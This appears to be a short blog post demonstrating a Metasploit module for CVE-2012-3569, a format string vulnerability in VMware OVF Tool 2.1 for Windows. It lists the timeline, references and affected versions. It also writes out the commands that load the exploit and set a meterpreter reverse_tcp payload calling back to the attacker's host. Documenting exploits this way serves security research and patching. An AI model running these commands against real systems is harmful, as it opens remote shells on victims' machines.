Timeline :
Vulnerability discovered and reported to vendor by Jeremy Brown of Microsoft
Coordinated public release of the vulnerability the 2012-11-08
Metasploit PoC provided the 2013-02-04
PoC provided by :
Jeremy Brown
juan vazquez
Reference(s) :
CVE-2012-3569
OSVDB-87117
BID-56468
VMSA-2012-0015
Affected version(s) :
VMware OVF Tool 2.1 and earlier for Windows
VMware Workstation 8.0.5 and earlier for Windows
VMware Player 4.0.4 and earlier for Windows
Tested on Windows XP Pro SP3 with :
VMware OVF Tool 2.1
Description :
This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.
Commands :
use exploit/windows/browser/ovftool_format_string set SRVHOST 192.168.178.26 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit getuid sysinfo
RT @eromang: CVE-2012-3569 #VMWare #OVF Tool Format String #Vulnerability #Metasploit Demo http://t.co/iOnc5fsd #infosec
RT @eromang: CVE-2012-3569 #VMWare #OVF Tool Format String #Vulnerability #Metasploit Demo http://t.co/iOnc5fsd #infosec